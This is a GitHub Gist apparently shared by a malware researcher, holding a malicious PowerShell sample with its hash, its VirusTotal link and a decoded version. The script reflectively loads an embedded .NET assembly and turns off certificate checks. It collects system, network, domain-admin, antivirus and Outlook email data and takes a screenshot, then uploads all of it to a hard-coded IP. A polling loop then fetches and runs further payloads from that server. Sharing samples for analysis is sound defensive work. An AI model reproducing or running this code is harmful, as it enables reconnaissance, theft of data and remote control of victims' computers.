Created
August 23, 2018 16:44
-
-
Save JohnLaTwC/e1e415023f2c67ab8d6fe8fcd423299f to your computer and use it in GitHub Desktop.
2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Hash: 2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132 | |
| ## VT Link: https://www.virustotal.com/#/file/2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132/detection | |
| ## Original file | |
| $YHRIul = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("MTYyLjI0NC4zMi4xNDg=")) | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
| $gxPVX = [System.Convert]::FromBase64String("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") | |
| $F058 = New-Object System.IO.MemoryStream(,$gxPVX) | |
| $hyeF4zoYOE = New-Object System.IO.MemoryStream | |
| $xo63t6L = New-Object System.IO.Compression.GzipStream $F058, ([IO.Compression.CompressionMode]::Decompress) | |
| $bm1ERYVfE = New-Object byte[](1024) | |
| while($true){$r=$xo63t6L.Read($bm1ERYVfE,0,1024);if ($r -le 0){break};$hyeF4zoYOE.Write($bm1ERYVfE,0,$r);} | |
| $xo63t6L.Close();$F058.Close();$s=$hyeF4zoYOE.ToArray();$hyeF4zoYOE.Close(); | |
| [System.Reflection.Assembly]::Load($s) | Out-Null | |
| [OqkZsI7.OqkZsI7]::WETJLKk2r1() | |
| iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZnVuY3Rpb24gTndsS2JOUDJCKFtpbnRdJHJrNFFMLCBbYnl0ZVtdXSR4b0FCSGpGVSkKewogICAgJG1CSWJtID0gImh0dHBzOi8vJFlIUkl1bC8iICsgW09xa1pzSTcuT3FrWnNJN106OkNrMllhKCRyazRRTCwgMCwgJHRydWUpCiAgICAkaXdKenNQWGEgPSBbT3FrWnNJNy5PcWtac0k3XTo6SXRwVWlSMU9UT3QoJHhvQUJIakZVKQogICAgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLlVwbG9hZERhdGEoJG1CSWJtLCAkaXdKenNQWGEpCn0KCmZ1bmN0aW9uIFIxQ2szVXhWM0xJKCkKewogICAgJEpWbVJiID0gIlNZU1RFTUlORk86YG5gbiIgKyAoKHN5c3RlbWluZm8pIC1qb2luICJgbiIpCiAgICAkSlZtUmIgKz0gImBuYG5JUENPTkZJRzpgbmBuIiArICgoaXBjb25maWcgL2FsbCkgLWpvaW4gImBuIikKICAgICRKVm1SYiArPSAiYG5gbk5FVFNUQVQ6YG5gbiIgKyAoKG5ldHN0YXQgLWYpIC1qb2luICJgbiIpCiAgICAkSlZtUmIgKz0gImBuYG5ORVRWSUVXOmBuYG4iICsgKChuZXQgdmlldykgLWpvaW4gImBuIikKICAgICRKVm1SYiArPSAiYG5gblRBU0tMSVNUOmBuYG4iICsgKCh0YXNrbGlzdCkgLWpvaW4gImBuIikKICAgICRKVm1SYiArPSAiYG5gbldIT0FNSTpgbmBuIiArICgod2hvYW1pKSAtam9pbiAiYG4iKQogICAgJEpWbVJiICs9ICJgbmBuVVNFUk5BTUU6YG5gbiIgKyAoKG5ldCB1c2VyICRlbnY6dXNlcm5hbWUgL2RvbWFpbikgLWpvaW4gImBuIikKICAgICRKVm1SYiArPSAiYG5gbkRPTUFJTiBBRE1JTlM6YG5gbiIgKyAoKG5ldCBncm91cCAiZG9tYWluIGFkbWlucyIgL2RvbWFpbiApIC1qb2luICJgbiIpCiAgICAkSlZtUmIgKz0gImBuYG5ERVNLVE9QOmBuYG4iICsgKEdldC1DaGlsZEl0ZW0gKFtlbnZpcm9ubWVudF06OmdldGZvbGRlcnBhdGgoImRlc2t0b3AiKSkgfCBPdXQtU3RyaW5nKQogICAgJEpWbVJiICs9ICJgbmBuQVY6YG5gbiIgKyAoR2V0LVdtaU9iamVjdCAtTmFtZXNwYWNlICJyb290XFNlY3VyaXR5Q2VudGVyMiIgLVF1ZXJ5ICJTRUxFQ1QgKiBGUk9NIEFudGlWaXJ1c1Byb2R1Y3QiKS5kaXNwbGF5TmFtZQogICAgJHhvQUJIakZVID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkSlZtUmIpCiAgICBOd2xLYk5QMkIgMCAkeG9BQkhqRlUKfQoKZnVuY3Rpb24geU9JVkpNaGdSbygpCnsKICAgICRKVm1SYiA9ICIiCiAgICBpZiAoVGVzdC1QYXRoICdoa2N1OlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93cyBOVFxDdXJyZW50VmVyc2lvblxXaW5kb3dzIE1lc3NhZ2luZyBTdWJzeXN0ZW1cUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NicpIHsKICAgICAgICAkZ25FQVl4SDR3ID0gImhrY3U6XFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzIE5UXEN1cnJlbnRWZXJzaW9uXFdpbmRvd3MgTWVzc2FnaW5nIFN1YnN5c3RlbVxQcm9maWxlc1xPdXRsb29rXDkzNzVDRkYwNDEzMTExZDNCODhBMDAxMDRCMkE2Njc2XCoiCiAgICB9IGVsc2VpZiAoVGVzdC1QYXRoICdoa2N1OlxTb2Z0d2FyZVxNaWNyb3NvZnRcT2ZmaWNlXDE1LjBcT3V0bG9va1xQcm9maWxlcycpIHsKICAgICAgICAkZ25FQVl4SDR3ID0gImhrY3U6XFNvZnR3YXJlXE1pY3Jvc29mdFxPZmZpY2VcMTUuMFxPdXRsb29rXFByb2ZpbGVzXCpcOTM3NUNGRjA0MTMxMTFkM0I4OEEwMDEwNEIyQTY2NzZcKiIKICAgIH0gZWxzZWlmIChUZXN0LVBhdGggJ2hrY3U6XFNvZnR3YXJlXE1pY3Jvc29mdFxPZmZpY2VcMTYuMFxPdXRsb29rXFByb2ZpbGVzJykgewogICAgICAgICRnbkVBWXhINHcgPSAiaGtjdTpcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNi4wXE91dGxvb2tcUHJvZmlsZXNcKlw5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NlwqIgogICAgfSBlbHNlIHsgJGduRUFZeEg0dyA9ICIiIH0KICAgIGlmICgkZ25FQVl4SDR3IC1uZSAiIikgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgICRTc1hIYUp6a1ZRID0gKEdldC1JdGVtUHJvcGVydHkgJGduRUFZeEg0dyB8IFdoZXJlIHskXyAtbWF0Y2ggJ0VtYWlsJ30pCiAgICAgICAgICAgIGZvcmVhY2ggKCRtIGluICRTc1hIYUp6a1ZRKSB7CiAgICAgICAgICAgICAgICBpZiAoJG0uRW1haWwuR2V0VHlwZSgpLklzQXJyYXkpIHsKICAgICAgICAgICAgICAgICAgICAkbWwgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlLkdldFN0cmluZygkbS5FbWFpbCkKICAgICAgICAgICAgICAgIH0gZWxzZSB7JG1sID0gJG0uRW1haWx9CiAgICAgICAgICAgICAgICAkSlZtUmIgKz0gImVtYWlsOiAiICsgJG1sICsgImBuIgogICAgICAgICAgICB9CiAgICAgICAgfSBjYXRjaCB7fQogICAgfQogICAgaWYgKCRKVm1SYiAtbmUgIiIpCiAgICB7CiAgICAgICAgJHhvQUJIakZVID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkSlZtUmIpCiAgICAgICAgTndsS2JOUDJCIDEgJHhvQUJIakZVCiAgICB9Cn0KCmZ1bmN0aW9uIHRVNVFqSCgpCnsKICAgIEFkZC1UeXBlIC1Bc3NlbWJseSBTeXN0ZW0uV2luZG93cy5Gb3JtcwogICAgJGVvNmpndTRaID0gW1dpbmRvd3MuRm9ybXMuU3lzdGVtSW5mb3JtYXRpb25dOjpWaXJ0dWFsU2NyZWVuCiAgICAkUHhiaHd2dGRyID0gTmV3LU9iamVjdCBEcmF3aW5nLkJpdG1hcCAkZW82amd1NFouV2lkdGgsICRlbzZqZ3U0Wi5IZWlnaHQKICAgICRvYk9FTkVacyA9IFtEcmF3aW5nLkdyYXBoaWNzXTo6RnJvbUltYWdlKCRQeGJod3Z0ZHIpCiAgICAkb2JPRU5FWnMuQ29weUZyb21TY3JlZW4oJGVvNmpndTRaLkxvY2F0aW9uLCBbRHJhd2luZy5Qb2ludF06OkVtcHR5LCAkZW82amd1NFouU2l6ZSkKICAgICRvYk9FTkVacy5EaXNwb3NlKCkKICAgICRwWlBEa0ogPSBOZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0KICAgICRjbWxWPTQwCiAgICAkaXdKenNQWGFvZGVyUGFyYW1zID0gTmV3LU9iamVjdCBTeXN0ZW0uRHJhd2luZy5JbWFnaW5nLkVuY29kZXJQYXJhbWV0ZXJzCiAgICAkaXdKenNQWGFvZGVyUGFyYW1zLlBhcmFtWzBdID0gTmV3LU9iamVjdCBEcmF3aW5nLkltYWdpbmcuRW5jb2RlclBhcmFtZXRlciAoW1N5c3RlbS5EcmF3aW5nLkltYWdpbmcuRW5jb2Rlcl06OlF1YWxpdHksICRjbWxWKQogICAgJExETzhHID0gW0RyYXdpbmcuSW1hZ2luZy5JbWFnZUNvZGVjSW5mb106OkdldEltYWdlRW5jb2RlcnMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkZvcm1hdERlc2NyaXB0aW9uIC1lcSAiSlBFRyIgfQogICAgJFB4Ymh3dnRkci5zYXZlKCRwWlBEa0osICRMRE84RywgJGl3SnpzUFhhb2RlclBhcmFtcykKICAgICRQeGJod3Z0ZHIuRGlzcG9zZSgpCiAgICAkeG9BQkhqRlUgPSBbY29udmVydF06OlRvQmFzZTY0U3RyaW5nKCRwWlBEa0ouVG9BcnJheSgpKQogICAgJHhvQUJIakZVID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0Qnl0ZXMoJHhvQUJIakZVKQogICAgTndsS2JOUDJCIDIgJHhvQUJIakZVCn0KClIxQ2szVXhWM0xJCnlPSVZKTWhnUm8KdFU1UWpI"))) | |
| while ($true) | |
| { | |
| $WyOk2FS = New-Object System.Net.WebClient | |
| $q8TZu3 = "https://$YHRIul/" + [OqkZsI7.OqkZsI7]::Ck2Ya(0, 0, $False) | |
| $lynG2gAi9s5 = $WyOk2FS.DownloadData($q8TZu3) | |
| if ($lynG2gAi9s5.Length -gt 48) | |
| { | |
| $hMRg0t1iy = [BitConverter]::ToUInt32($lynG2gAi9s5, 4) | |
| $lM0x5QR68J = [OqkZsI7.OqkZsI7]::iputY7e($lynG2gAi9s5[8..$lynG2gAi9s5.Length]) | |
| $sYeu = 1 | |
| if ($lM0x5QR68J -ne $null) | |
| { | |
| [OqkZsI7.OqkZsI7]::TLybhcYk0k($lM0x5QR68J) | |
| $sYeu = 0 | |
| } | |
| $WyOk2FS.DownloadData("https://$YHRIul/" + [OqkZsI7.OqkZsI7]::Ck2Ya($hMRg0t1iy, $sYeu, $False)) | Out-Null | |
| } | |
| Start-Sleep -s 250 | |
| } | |
| ## Decoded script: | |
| $YHRIul = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("162.244.32.148")) | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
| $gxPVX = [System.Convert]::FromBase64String("MZ...This program cannot be run in DOS mode. <Embedded EXE> | |
| ... | |
| <Module>tools.dllOqkZsI7mscorlibSystemObjectVirtualAllocCreateThreadciWETJLKk2r1Epp6tvOuGlJtJfgngnv1qYXwbeBzjPwgsD5HjeAUDrhEIKQsePl4Ck2YaItpUiR1OTOtiputY7eTLybhcYk0k.ctorabcdefbytessinputoutputkeydataividstatuspostSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributetoolsSystem.Runtime.InteropServicesDllImportAttributekernel32EnvironmentOperatingSystemget_OSVersionVersionget_VersionSystem.Security.PrincipalWindowsIdentityGetCurrentSecurityIdentifierget_UserIdentityReferenceget_ValueCharStringSplitSystem.IOMemoryStreamBinaryWriterStreamUInt32ParseWriteSystem.TextEncodingget_Unicodeget_MachineNameGetBytesIntPtrget_Sizeget_Majorget_Minorget_BuildCloseToArrayEmptyStringBuilderAppendToStringget_LengthRandomget_CharsNextByteBitConverterToUInt32ConcatNextBytesArrayCopyBinaryReaderReadUInt32ReadBytesMarshalZeroop_Explicit.cctor/ .asp .jpgAUElMI | |
| InternalNametools.dll(LegalCopyright < | |
| ... | |
| OriginalFilenametools.dll4ProductVersion0.0.0.08Assembly Version0.0.0.003") | |
| $F058 = New-Object System.IO.MemoryStream(,$gxPVX) | |
| $hyeF4zoYOE = New-Object System.IO.MemoryStream | |
| $xo63t6L = New-Object System.IO.Compression.GzipStream $F058, ([IO.Compression.CompressionMode]::Decompress) | |
| $bm1ERYVfE = New-Object byte[](1024) | |
| while($true){$r=$xo63t6L.Read($bm1ERYVfE,0,1024);if ($r -le 0){break};$hyeF4zoYOE.Write($bm1ERYVfE,0,$r);} | |
| $xo63t6L.Close();$F058.Close();$s=$hyeF4zoYOE.ToArray();$hyeF4zoYOE.Close(); | |
| [System.Reflection.Assembly]::Load($s) | Out-Null | |
| [OqkZsI7.OqkZsI7]::WETJLKk2r1() | |
| iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("function NwlKbNP2B([int]$rk4QL, [byte[]]$xoABHjFU) | |
| { | |
| $mBIbm = "https://$YHRIul/" + [OqkZsI7.OqkZsI7]::Ck2Ya($rk4QL, 0, $true) | |
| $iwJzsPXa = [OqkZsI7.OqkZsI7]::ItpUiR1OTOt($xoABHjFU) | |
| (New-Object System.Net.WebClient).UploadData($mBIbm, $iwJzsPXa) | |
| } | |
| function R1Ck3UxV3LI() | |
| { | |
| $JVmRb = "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n") | |
| $JVmRb += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n") | |
| $JVmRb += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n") | |
| $JVmRb += "`n`nNETVIEW:`n`n" + ((net view) -join "`n") | |
| $JVmRb += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n") | |
| $JVmRb += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n") | |
| $JVmRb += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n") | |
| $JVmRb += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n") | |
| $JVmRb += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String) | |
| $JVmRb += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName | |
| $xoABHjFU = [System.Text.Encoding]::UTF8.GetBytes($JVmRb) | |
| NwlKbNP2B 0 $xoABHjFU | |
| } | |
| function yOIVJMhgRo() | |
| { | |
| $JVmRb = "" | |
| if (Test-Path 'hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676') { | |
| $gnEAYxH4w = "hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*" | |
| } elseif (Test-Path 'hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles') { | |
| $gnEAYxH4w = "hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*" | |
| } elseif (Test-Path 'hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles') { | |
| $gnEAYxH4w = "hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*" | |
| } else { $gnEAYxH4w = "" } | |
| if ($gnEAYxH4w -ne "") { | |
| try { | |
| $SsXHaJzkVQ = (Get-ItemProperty $gnEAYxH4w | Where {$_ -match 'Email'}) | |
| foreach ($m in $SsXHaJzkVQ) { | |
| if ($m.Email.GetType().IsArray) { | |
| $ml = [System.Text.Encoding]::Unicode.GetString($m.Email) | |
| } else {$ml = $m.Email} | |
| $JVmRb += "email: " + $ml + "`n" | |
| } | |
| } catch {} | |
| } | |
| if ($JVmRb -ne "") | |
| { | |
| $xoABHjFU = [System.Text.Encoding]::UTF8.GetBytes($JVmRb) | |
| NwlKbNP2B 1 $xoABHjFU | |
| } | |
| } | |
| function tU5QjH() | |
| { | |
| Add-Type -Assembly System.Windows.Forms | |
| $eo6jgu4Z = [Windows.Forms.SystemInformation]::VirtualScreen | |
| $Pxbhwvtdr = New-Object Drawing.Bitmap $eo6jgu4Z.Width, $eo6jgu4Z.Height | |
| $obOENEZs = [Drawing.Graphics]::FromImage($Pxbhwvtdr) | |
| $obOENEZs.CopyFromScreen($eo6jgu4Z.Location, [Drawing.Point]::Empty, $eo6jgu4Z.Size) | |
| $obOENEZs.Dispose() | |
| $pZPDkJ = New-Object System.IO.MemoryStream | |
| $cmlV=40 | |
| $iwJzsPXaoderParams = New-Object System.Drawing.Imaging.EncoderParameters | |
| $iwJzsPXaoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $cmlV) | |
| $LDO8G = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" } | |
| $Pxbhwvtdr.save($pZPDkJ, $LDO8G, $iwJzsPXaoderParams) | |
| $Pxbhwvtdr.Dispose() | |
| $xoABHjFU = [convert]::ToBase64String($pZPDkJ.ToArray()) | |
| $xoABHjFU = [System.Text.Encoding]::ASCII.GetBytes($xoABHjFU) | |
| NwlKbNP2B 2 $xoABHjFU | |
| } | |
| R1Ck3UxV3LI | |
| yOIVJMhgRo | |
| tU5QjH"))) | |
| while ($true) | |
| { | |
| $WyOk2FS = New-Object System.Net.WebClient | |
| $q8TZu3 = "https://$YHRIul/" + [OqkZsI7.OqkZsI7]::Ck2Ya(0, 0, $False) | |
| $lynG2gAi9s5 = $WyOk2FS.DownloadData($q8TZu3) | |
| if ($lynG2gAi9s5.Length -gt 48) | |
| { | |
| $hMRg0t1iy = [BitConverter]::ToUInt32($lynG2gAi9s5, 4) | |
| $lM0x5QR68J = [OqkZsI7.OqkZsI7]::iputY7e($lynG2gAi9s5[8..$lynG2gAi9s5.Length]) | |
| $sYeu = 1 | |
| if ($lM0x5QR68J -ne $null) | |
| { | |
| [OqkZsI7.OqkZsI7]::TLybhcYk0k($lM0x5QR68J) | |
| $sYeu = 0 | |
| } | |
| $WyOk2FS.DownloadData("https://$YHRIul/" + [OqkZsI7.OqkZsI7]::Ck2Ya($hMRg0t1iy, $sYeu, $False)) | Out-Null | |
| } | |
| Start-Sleep -s 250 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment